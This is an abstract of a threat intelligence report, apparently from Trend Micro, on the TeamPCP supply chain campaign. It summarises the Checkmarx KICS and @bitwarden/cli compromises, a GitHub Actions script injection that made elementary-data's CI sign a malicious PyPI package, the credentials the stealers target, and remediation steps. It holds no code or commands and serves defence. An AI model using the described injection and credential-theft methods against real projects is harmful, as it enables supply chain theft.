Trend Micro researchers detail TeamPCP, a financially motivated threat actor running a coordinated supply chain campaign from March to April 2026 with at least seven confirmed waves. Two case studies are examined: the April 22 Checkmarx KICS attack, which simultaneously poisoned Docker Hub images, VS Code/OpenVSX extensions, and GitHub Actions workflows, then used stolen npm tokens to hijack @bitwarden/cli within 24 hours; and the April 24 elementary-data attack, where a single unsanitized pull request comment triggered GitHub Actions script injection, causing the project's own CI to build and sign a malicious PyPI package. Both payloads target GitHub PATs, cloud credentials (AWS/GCP/Azure), SSH keys, Kubernetes secrets, database credentials, and cryptocurrency wallets. The elementary-data stealer also makes live AWS API calls to enumerate Secrets Manager and SSM Parameter Store. Remediation includes rotating all credentials from clean hosts, pinning Docker images to verified digests, auditing GitHub Actions workflows for unsanitized user-controlled expressions in run blocks, and applying network egress controls to CI runners.
Table of contents
Security recommendationsTrendAI Vision One™ IntegrationTrendAI Vision One™ Threat Intelligence HubTrendAI Vision One™ Intelligence Reports (IoC Sweeping)MITRE ATT&CK mappingSort: